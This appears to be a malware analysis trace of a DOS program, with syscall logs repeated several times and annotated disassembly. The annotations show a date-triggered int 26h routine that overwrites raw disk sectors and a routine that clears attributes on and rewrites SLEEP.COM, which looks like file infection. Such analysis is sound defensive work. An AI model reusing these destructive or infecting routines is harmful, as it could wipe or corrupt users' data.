{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.91924194Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; right after DOS Get date (DL = day of month): is it the 2nd?
0x12a5d: je 0x12a62  ; day == 2 -> destructive branch at 0x12a62
0x12a5f: jmp 0x12a80  ; any other day -> straight to the ret at 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2  ; only AH is written; AL, which int 26h takes as the drive, is not set in the visible lines
0x12a65: cdq  ; NOTE(review): instruction sizes here look 16-bit, where this opcode is CWD (DX = sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100 sectors
0x12a69: int 0x26  ; DOS absolute disk write (AL drive, CX count, DX first sector, DS:BX buffer): raw sector overwrite
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3: drive D: in int 26h numbering (0 = A:)
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc sectors
0x12a74: mov dx, 0  ; DX = 0: start at the first logical sector
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]  ; DS:BX from stored words; presumably the write buffer - TODO confirm
0x12a7d: call 0x22a62  ; NOTE(review): shown target is 0x10000 above 0x12a62; a 16-bit near call would wrap to it - likely a display artifact
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret: linear-sweep output, not necessarily reachable code
2018-12-25T12:21:16.921989701Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.926398849Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.931173198Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.93283124Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.941406718Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.949474259Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.956435139Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; right after DOS Get time: DL (hundredths) += DH (seconds), a clock-derived byte
0x12c90: je 0x12c8a  ; sum is zero -> back to 0x12c8a (outside this excerpt), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word at [0x106]; looks like a relocation delta - TODO confirm
0x12c99: mov byte ptr [si], dl  ; store the clock-derived byte at SI; presumably a per-infection key or marker - verify
0x12c9b: mov ax, 0x4301  ; int 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = file name at SI + 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: open again with read/write access
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set = open failed -> error path at 0x12c63 (not shown)
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at ES:[DX + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write to file; the trace lines after this excerpt log writes of 4, 2 and 2 bytes
2018-12-25T12:21:16.959518612Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.979603517Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.982114026Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.990569889Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.000568419Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.004596791Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.008183364Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.010381281Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.013202908Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.023019916Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.026030658Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.027278587Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.035809868Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:17.052578278Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:17.057106588Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.065442541Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.077344219Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.081011041Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.338857664Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.34237535Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.350324492Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.353483238Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.358138031Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.361791818Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.363861401Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.367255577Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.414125279Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.417421149Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.419225111Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.428371684Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.439343145Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:17.442737099Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.450940105Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.465613616Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.468180522Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.480331166Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.482437268Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.490565463Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.494420146Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.497431764Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.500639239Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.505362581Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.508568549Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.518528048Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.521792035Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.523603673Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.532469851Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.544237852Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; right after DOS Get date (DH = month, DL = day): is it 6 June?
0x12b73: je 0x12b78  ; match -> 0x12d28 via the jmp at 0x12b78 (target not shown in this excerpt)
0x12b75: jmp 0x12d94  ; no match -> 0x12d94; the trace resumes at 0x12d9f, consistent with this branch
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh  ; NOTE(review): nothing visible branches here; 0x12b7b-0x12b83 look like data decoded as code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B, so the linear sweep is likely misaligned here
0x12b86: in al, dx  ; byte EC; read from 0x12b84, 55 / 8B EC would be push bp / mov bp, sp (a function prologue)
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer at BP - 0x2c
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b97: mov cx, 0x10  ; CX = 0x10: attribute mask with the directory bit
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:17.547550357Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.553205162Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.151760749Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; right after DOS Get date (DL = day of month): is it the 2nd?
0x12a5d: je 0x12a62  ; day == 2 -> destructive branch at 0x12a62
0x12a5f: jmp 0x12a80  ; any other day -> straight to the ret at 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2  ; only AH is written; AL, which int 26h takes as the drive, is not set in the visible lines
0x12a65: cdq  ; NOTE(review): instruction sizes here look 16-bit, where this opcode is CWD (DX = sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100 sectors
0x12a69: int 0x26  ; DOS absolute disk write (AL drive, CX count, DX first sector, DS:BX buffer): raw sector overwrite
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3: drive D: in int 26h numbering (0 = A:)
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc sectors
0x12a74: mov dx, 0  ; DX = 0: start at the first logical sector
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]  ; DS:BX from stored words; presumably the write buffer - TODO confirm
0x12a7d: call 0x22a62  ; NOTE(review): shown target is 0x10000 above 0x12a62; a 16-bit near call would wrap to it - likely a display artifact
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret: linear-sweep output, not necessarily reachable code
2018-12-25T12:21:17.154450059Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.157775427Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.162480657Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.163587027Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.177242969Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.184465399Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.191421483Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; right after DOS Get time: DL (hundredths) += DH (seconds), a clock-derived byte
0x12c90: je 0x12c8a  ; sum is zero -> back to 0x12c8a (outside this excerpt), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word at [0x106]; looks like a relocation delta - TODO confirm
0x12c99: mov byte ptr [si], dl  ; store the clock-derived byte at SI; presumably a per-infection key or marker - verify
0x12c9b: mov ax, 0x4301  ; int 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = file name at SI + 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: open again with read/write access
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set = open failed -> error path at 0x12c63 (not shown)
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at ES:[DX + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write to file; the trace lines after this excerpt log writes of 4, 2 and 2 bytes
2018-12-25T12:21:17.196600686Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.406895826Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.409448567Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.418925698Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.422680033Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.42569771Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.43002166Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.432453498Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.435338442Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.446265723Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.450194299Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.452341208Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.461356211Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:17.473400993Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:17.47685869Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.484673806Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.493421543Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.497183829Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.513014868Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.51605932Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.52417219Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.527638912Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.531713759Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.534846323Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.536929939Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.541227303Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.5514816Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.554225701Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.556082455Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.5673484Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.579565689Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:17.584313947Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.593637178Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.601858588Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.604867803Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.806880532Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.809522599Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.817607522Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.821953892Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.825125314Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.828239979Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.830538218Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.833106892Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.941020862Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.944489988Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.947041996Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.956864253Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.964971339Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; right after DOS Get date (DH = month, DL = day): is it 6 June?
0x12b73: je 0x12b78  ; match -> 0x12d28 via the jmp at 0x12b78 (target not shown in this excerpt)
0x12b75: jmp 0x12d94  ; no match -> 0x12d94; the trace resumes at 0x12d9f, consistent with this branch
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh  ; NOTE(review): nothing visible branches here; 0x12b7b-0x12b83 look like data decoded as code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B, so the linear sweep is likely misaligned here
0x12b86: in al, dx  ; byte EC; read from 0x12b84, 55 / 8B EC would be push bp / mov bp, sp (a function prologue)
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer at BP - 0x2c
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b97: mov cx, 0x10  ; CX = 0x10: attribute mask with the directory bit
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:17.967709003Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.970475791Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.348152838Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; right after DOS Get date (DL = day of month): is it the 2nd?
0x12a5d: je 0x12a62  ; day == 2 -> destructive branch at 0x12a62
0x12a5f: jmp 0x12a80  ; any other day -> straight to the ret at 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2  ; only AH is written; AL, which int 26h takes as the drive, is not set in the visible lines
0x12a65: cdq  ; NOTE(review): instruction sizes here look 16-bit, where this opcode is CWD (DX = sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100 sectors
0x12a69: int 0x26  ; DOS absolute disk write (AL drive, CX count, DX first sector, DS:BX buffer): raw sector overwrite
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3: drive D: in int 26h numbering (0 = A:)
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc sectors
0x12a74: mov dx, 0  ; DX = 0: start at the first logical sector
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]  ; DS:BX from stored words; presumably the write buffer - TODO confirm
0x12a7d: call 0x22a62  ; NOTE(review): shown target is 0x10000 above 0x12a62; a 16-bit near call would wrap to it - likely a display artifact
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret: linear-sweep output, not necessarily reachable code
2018-12-25T12:21:17.35122257Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.35614136Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.360616595Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.361863274Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.369370876Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.376322319Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.38313152Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; right after DOS Get time: DL (hundredths) += DH (seconds), a clock-derived byte
0x12c90: je 0x12c8a  ; sum is zero -> back to 0x12c8a (outside this excerpt), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word at [0x106]; looks like a relocation delta - TODO confirm
0x12c99: mov byte ptr [si], dl  ; store the clock-derived byte at SI; presumably a per-infection key or marker - verify
0x12c9b: mov ax, 0x4301  ; int 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = file name at SI + 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: open again with read/write access
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set = open failed -> error path at 0x12c63 (not shown)
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at ES:[DX + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write to file; the trace lines after this excerpt log writes of 4, 2 and 2 bytes
2018-12-25T12:21:17.386025794Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.414808773Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.417015548Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.42610808Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.433631345Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.43709026Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.440475542Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.442087244Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.444439348Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.454523258Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.457468594Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.459067815Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.468136032Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:17.480744909Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:17.483750652Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.491010235Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.501131243Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.502972616Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.514353942Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.517329478Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.523269095Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.525447345Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.528610172Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.531171216Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.532554267Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.534437295Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.545368421Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.548534715Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.55080343Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.561139042Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.572550553Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:17.57592805Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.585163242Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.593684803Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.596466109Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.806664919Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.808804125Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.817679985Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.822199497Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.826497885Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.830231352Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.832325612Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.835344938Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.941053494Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.942920914Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.944907438Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.950854618Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.958405084Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; right after DOS Get date (DH = month, DL = day): is it 6 June?
0x12b73: je 0x12b78  ; match -> 0x12d28 via the jmp at 0x12b78 (target not shown in this excerpt)
0x12b75: jmp 0x12d94  ; no match -> 0x12d94; the trace resumes at 0x12d9f, consistent with this branch
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh  ; NOTE(review): nothing visible branches here; 0x12b7b-0x12b83 look like data decoded as code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B, so the linear sweep is likely misaligned here
0x12b86: in al, dx  ; byte EC; read from 0x12b84, 55 / 8B EC would be push bp / mov bp, sp (a function prologue)
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer at BP - 0x2c
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b97: mov cx, 0x10  ; CX = 0x10: attribute mask with the directory bit
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:17.961308954Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.964811114Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.560448916Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; right after DOS Get date (DL = day of month): is it the 2nd?
0x12a5d: je 0x12a62  ; day == 2 -> destructive branch at 0x12a62
0x12a5f: jmp 0x12a80  ; any other day -> straight to the ret at 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2  ; only AH is written; AL, which int 26h takes as the drive, is not set in the visible lines
0x12a65: cdq  ; NOTE(review): instruction sizes here look 16-bit, where this opcode is CWD (DX = sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100 sectors
0x12a69: int 0x26  ; DOS absolute disk write (AL drive, CX count, DX first sector, DS:BX buffer): raw sector overwrite
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3: drive D: in int 26h numbering (0 = A:)
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc sectors
0x12a74: mov dx, 0  ; DX = 0: start at the first logical sector
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]  ; DS:BX from stored words; presumably the write buffer - TODO confirm
0x12a7d: call 0x22a62  ; NOTE(review): shown target is 0x10000 above 0x12a62; a 16-bit near call would wrap to it - likely a display artifact
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret: linear-sweep output, not necessarily reachable code
2018-12-25T12:21:17.563628964Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.567331945Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.571780705Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.57310589Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.586784337Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.601141097Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.609225327Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; right after DOS Get time: DL (hundredths) += DH (seconds), a clock-derived byte
0x12c90: je 0x12c8a  ; sum is zero -> back to 0x12c8a (outside this excerpt), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word at [0x106]; looks like a relocation delta - TODO confirm
0x12c99: mov byte ptr [si], dl  ; store the clock-derived byte at SI; presumably a per-infection key or marker - verify
0x12c9b: mov ax, 0x4301  ; int 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = file name at SI + 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: open again with read/write access
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set = open failed -> error path at 0x12c63 (not shown)
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at ES:[DX + 0x63]
